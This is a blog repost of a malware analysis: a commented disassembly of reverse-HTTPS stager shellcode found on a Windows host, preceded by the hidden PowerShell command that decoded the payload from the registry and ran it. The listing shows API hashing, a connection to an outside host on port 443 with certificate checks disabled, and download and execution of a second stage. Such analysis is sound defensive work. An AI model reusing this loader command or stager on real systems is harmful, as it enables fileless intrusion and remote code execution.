; shellcode found on Windows host. Payload was stored in the registry. Powershell
; was used to extract it from the registry and execute it:
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
; hidden -c "$val = (gp HKLM:SOFTWARE\'਀਀').'਀਀'; \
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"

; The following references were used to help comment the shellcode
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/

    0x00080000:  cld     cld
    0x00080001:  call    0x8008f
    0x00080006:  pushal  pushal   ; 60
    0x00080007:  mov     ebp, esp ; 98 e5
    0x00080009:  xor     edx, edx ; 31 d2
    0x0008000B:  mov     edx, dword ptr fs:[edx + 0x30]
    0x0008000F:  mov     edx, dword ptr [edx + 0xc]
    0x00080012:  mov     edx, dword ptr [edx + 0x14]
    0x00080015:  mov     esi, dword ptr [edx + 0x28]
    0x00080018:  movzx   ecx, word ptr [edx + 0x26]
    0x0008001C:  xor     edi, edi
    0x0008001E:  xor     eax, eax
    0x00080020:  lodsb   al, byte ptr [esi]
    0x00080021:  cmp     al, 0x61
    0x00080023:  jl      0x80027
    0x00080025:  sub     al, 0x20
    0x00080027:  ror     edi, 0xd
    0x0008002A:  add     edi, eax
    0x0008002C:  loop    0x8001e
    0x0008002E:  push    edx
    0x0008002F:  push    edi
    0x00080030:  mov     edx, dword ptr [edx + 0x10]
    0x00080033:  mov     eax, dword ptr [edx + 0x3c]
    0x00080036:  add     eax, edx
    0x00080038:  mov     eax, dword ptr [eax + 0x78]
    0x0008003B:  test    eax, eax
    0x0008003D:  je      0x80089
    0x0008003F:  add     eax, edx
    0x00080041:  push    eax
    0x00080042:  mov     ecx, dword ptr [eax + 0x18]
    0x00080045:  mov     ebx, dword ptr [eax + 0x20]
    0x00080048:  add     ebx, edx
    0x0008004A:  jecxz   0x80088
    0x0008004C:  dec     ecx
    0x0008004D:  mov     esi, dword ptr [ebx + ecx*4]
    0x00080050:  add     esi, edx
    0x00080052:  xor     edi, edi
    0x00080054:  xor     eax, eax
    0x00080056:  lodsb   al, byte ptr [esi]
    0x00080057:  ror     edi, 0xd
    0x0008005A:  add     edi, eax
    0x0008005C:  cmp     al, ah
    0x0008005E:  jne     0x80054
    0x00080060:  add     edi, dword ptr [ebp - 8]
    0x00080063:  cmp     edi, dword ptr [ebp + 0x24]
    0x00080066:  jne     0x8004a
    0x00080068:  pop     eax
    0x00080069:  mov     ebx, dword ptr [eax + 0x24]
    0x0008006C:  add     ebx, edx
    0x0008006E:  mov     cx, word ptr [ebx + ecx*2]
    0x00080072:  mov     ebx, dword ptr [eax + 0x1c]
    0x00080075:  add     ebx, edx
    0x00080077:  mov     eax, dword ptr [ebx + ecx*4]
    0x0008007A:  add     eax, edx
    0x0008007C:  mov     dword ptr [esp + 0x24], eax
    0x00080080:  pop     ebx    ; 5b
    0x00080081:  pop     ebx    ; 5b
    0x00080082:  popal   popal  ; 61
    0x00080083:  pop     ecx    ; 59
    0x00080084:  pop     edx    ; 5a
    0x00080085:  push    ecx    ; 51
    0x00080086:  jmp     eax    ; ff e0
    0x00080088:  pop     eax    ; 58
    0x00080089:  pop     edi
    0x0008008A:  pop     edx
    0x0008008B:  mov     edx, dword ptr [edx]
    0x0008008D:  jmp     0x80015
    0x0008008F:  pop     ebp

; load wininet
    0x00080090:  push    0x74656e            ; Push the bytes 'wininet',0 onto the stack.
    0x00080095:  push    0x696e6977          ; ...
    0x0008009A:  push    esp                 ; Push a pointer to the "wininet" string on the stack.
    0x0008009B:  push    0x726774c           ; hash( "kernel32.dll", "LoadLibraryA" )
    0x000800A0:  call    ebp                 ; LoadLibraryA( "wininet" )
    0x000800A2:  call    0x80127

; user agent string - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; ASU2JS)

    ; INTERNETAPI_(HINTERNET) InternetOpenA(
    ;   LPCSTR lpszAgent,
    ;   DWORD  dwAccessType,
    ;   LPCSTR lpszProxy,
    ;   LPCSTR lpszProxyBypass,
    ;   DWORD  dwFlags);
    0x0008012C:  push    edi
    0x0008012D:  push    edi
    0x0008012E:  push    ecx
    0x0008012F:  push    0xa779563a      ; hash( "wininet.dll", "InternetOpenA" )
    0x00080134:  call    ebp

    0x00080136:  jmp     0x801ce

    ; void InternetConnectA(
    ;     HINTERNET     hInternet,
    ;     LPCSTR        lpszServerName,
    ;     INTERNET_PORT nServerPort,
    ;     LPCSTR        lpszUserName,
    ;     LPCSTR        lpszPassword,
    ;     DWORD         dwService,
    ;     DWORD         dwFlags,
    ;     DWORD_PTR     dwContext);
    0x0008013B:  pop     ebx             ; pop URL (hostname), store in ebx
    0x0008013C:  xor     ecx, ecx        ; NULL
    0x0008013E:  push    ecx             ; DWORD_PTR dwContext (NULL)
    0x0008013F:  push    ecx             ; dwFlags (NULL)
    0x00080140:  push    3               ; DWORD dwService (INTERNET_SERVICE_HTTP)
    0x00080142:  push    ecx             ; password (NULL)
    0x00080143:  push    ecx             ; username (NULL)
    0x00080144:  push    0x1bb           ; port 443
    0x00080149:  push    ebx             ; hostname
    0x0008014A:  push    eax             ; HINTERNET hInternet
    0x0008014B:  push    0xc69f8957      ; hash( "wininet.dll", "InternetConnectA" )
    0x00080150:  call    ebp
    0x00080152:  mov     ebx, eax        ; save hInternet

    0x00080154:  jmp     0x801d0

    ; INTERNETAPI_(HINTERNET) HttpOpenRequestA(
    ;   HINTERNET hConnect,
    ;   LPCSTR    lpszVerb,
    ;   LPCSTR    lpszObjectName,
    ;   LPCSTR    lpszVersion,
    ;   LPCSTR    lpszReferrer,
    ;   LPCSTR    *lplpszAcceptTypes,
    ;   DWORD     dwFlags,
    ;   DWORD_PTR dwContext);
    0x00080156:  pop     ecx
    0x00080157:  xor     edx, edx        ; NULL
    0x00080159:  push    edx             ; dwContext (NULL)
    0x0008015A:  push    0x84a03200      ; ( 0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
                                         ;   0x80000000 |        ; INTERNET_FLAG_RELOAD
                                         ;   0x04000000 |        ; INTERNET_NO_CACHE_WRITE
                                         ;   0x00800000 |        ; INTERNET_FLAG_SECURE
                                         ;   0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
                                         ;   0x00001000 |        ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
                                         ;   0x00002000 |        ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
                                         ;   0x00000200          ; INTERNET_FLAG_NO_UI
    0x0008015F:  push    edx             ; accept types (NULL)
    0x00080160:  push    edx             ; referrer (NULL)
    0x00080161:  push    edx             ; version (NULL)
    0x00080162:  push    ecx             ; url
    0x00080163:  push    edx             ; method
    0x00080164:  push    eax             ; hConnection
    0x00080165:  push    0x3b2e55eb      ; hash( "wininet.dll", "HttpOpenRequestA" )
    0x0008016A:  call    ebp
    0x0008016C:  mov     esi, eax        ; hHttpRequest

    ; BOOLAPI InternetSetOptionA(
    ;   HINTERNET hInternet,
    ;   DWORD     dwOption,
    ;   LPVOID    lpBuffer,
    ;   DWORD     dwBufferLength);
    0x0008016E:  push    0x3380          ; 0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
                                         ; 0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
                                         ; 0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
                                         ; 0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
                                         ; 0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
    0x00080173:  mov     eax, esp        ; move flags into eax

    0x00080175:  push    4               ; sizeof(dwFlags)
    0x00080177:  push    eax             ; &dwFlags
    0x00080178:  push    0x1f            ; DWORD dwOption (31 = INTERNET_OPTION_SECURITY_FLAGS)
    0x0008017A:  push    esi             ; hRequest
    0x0008017B:  push    0x869e4675      ; hash( "wininet.dll", "InternetSetOptionA" )
    0x00080180:  call    ebp

    ; BOOLAPI HttpSendRequestA(
    ;   HINTERNET hRequest,
    ;   LPCSTR    lpszHeaders,
    ;   DWORD     dwHeadersLength,
    ;   LPVOID    lpOptional,
    ;   DWORD     dwOptionalLength);
    0x00080182:  xor     edi, edi        ; NULL
    0x00080184:  push    edi             ; optional length
    0x00080185:  push    edi             ; optional
    0x00080186:  push    edi             ; dwHeadersLength
    0x00080187:  push    edi             ; headers
    0x00080188:  push    esi             ; hHttpRequest
    0x00080189:  push    0x7b18062d      ; hash( "wininet.dll", "HttpSendRequestA" )
    0x0008018E:  call    ebp
    0x00080190:  test    eax, eax        ; test for failure
    0x00080192:  je      0x801dc

    0x00080194:  xor     edi, edi
    0x00080196:  test    esi, esi
    0x00080198:  je      0x8019e
    0x0008019A:  mov     ecx, edi
    0x0008019C:  jmp     0x801a7
    0x0008019E:  push    0x5de2c5aa     ; hash( "kernel32.dll", "GetLastError" )
    0x000801A3:  call    ebp
    0x000801A5:  mov     ecx, eax
    0x000801A7:  push    0x315e2145     ; GetDesktopWindow
    0x000801AC:  call    ebp
    0x000801AE:  xor     edi, edi
    0x000801B0:  push    edi
    0x000801B1:  push    7
    0x000801B3:  push    ecx
    0x000801B4:  push    esi
    0x000801B5:  push    eax
    0x000801B6:  push    0xbe057b7      ; InternetErrorDlg
    0x000801BB:  call    ebp
    0x000801BD:  mov     edi, 0x2f00
    0x000801C2:  cmp     edi, eax
    0x000801C4:  jne     0x801ca
    0x000801C6:  mov     eax, ebx
    0x000801C8:  jmp     0x80154
    0x000801CA:  xor     edi, edi
    0x000801CC:  jmp     0x801e3
    0x000801CE:  jmp     0x80219
    0x000801D0:  call    0x80156
    0x000801D5:  das     das
    0x000801D6:  push    ebx
    0x000801D7:  outsw   dx, word ptr [esi]
    0x000801D9:  xor     al, 0
    0x000801DB:  add     byte ptr [eax - 0x10], ch
    0x000801DE:  mov     ch, 0xa2
    0x000801E0:  push    esi
    0x000801E1:  call    ebp

    0x000801E3:  push    0x40          ; PAGE_EXECUTE_READWRITE
    0x000801E5:  push    0x1000        ; MEM_COMMIT
    0x000801EA:  push    0x400000      ; Stage allocation (8Mb ought to do us)
    0x000801EF:  push    edi           ; NULL
    0x000801F0:  push    0xe553a458    ; hash( "kernel32.dll", "VirtualAlloc" )
    0x000801F5:  call    ebp           ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    0x000801F7:  xchg    eax, ebx
    0x000801F8:  push    ebx
    0x000801F9:  push    ebx
    0x000801FA:  mov     edi, esp
    0x000801FC:  push    edi           ; &bytesRead
    0x000801FD:  push    0x2000        ; read length
    0x00080202:  push    ebx           ; buffer
    0x00080203:  push    esi           ; hRequest
    0x00080204:  push    0xe2899612    ; hash( "wininet.dll", "InternetReadFile" )
    0x00080209:  call    ebp
    0x0008020B:  test    eax, eax      ; download failed? (optional?)
    0x0008020D:  je      0x801dc       ; failure???
    0x0008020F:  mov     eax, dword ptr [edi]
    0x00080211:  add     ebx, eax      ; buffer += bytes_received
    0x00080213:  test    eax, eax      ; optional?
    0x00080215:  jne     0x801fc       ; download_more???
    0x00080217:  pop     eax           ; clear the temporary storage
    0x00080218:  ret     ret           ; dive into the stored stage address
    0x00080219:  call    0x8013b       ; InternetConnectA

url:
	; 0x0008021E: 61
	; url foobar.com

 

출처 : https://gist.github.com/jdferrell3/4db966da06f4fa77816a54d802aca0f8 

'[+] etc..' 카테고리의 다른 글

python_Crat_strdecoder  (0) 2020.08.03
yara_Crat_encStr  (0) 2020.06.05
yara_signing_Exchange  (0) 2020.05.10
data structure  (0) 2020.04.30
yara_Nemty_memoryLoader  (0) 2019.09.20
블로그 이미지

bbbbox

해당 블로그는 개인 저장공간으로 악의적으로 응용할 시 피해가 발생할 수 있으며, 그에 대해 책임은 사용자에게 있습니다. 주의해주시길 바랍니다.

,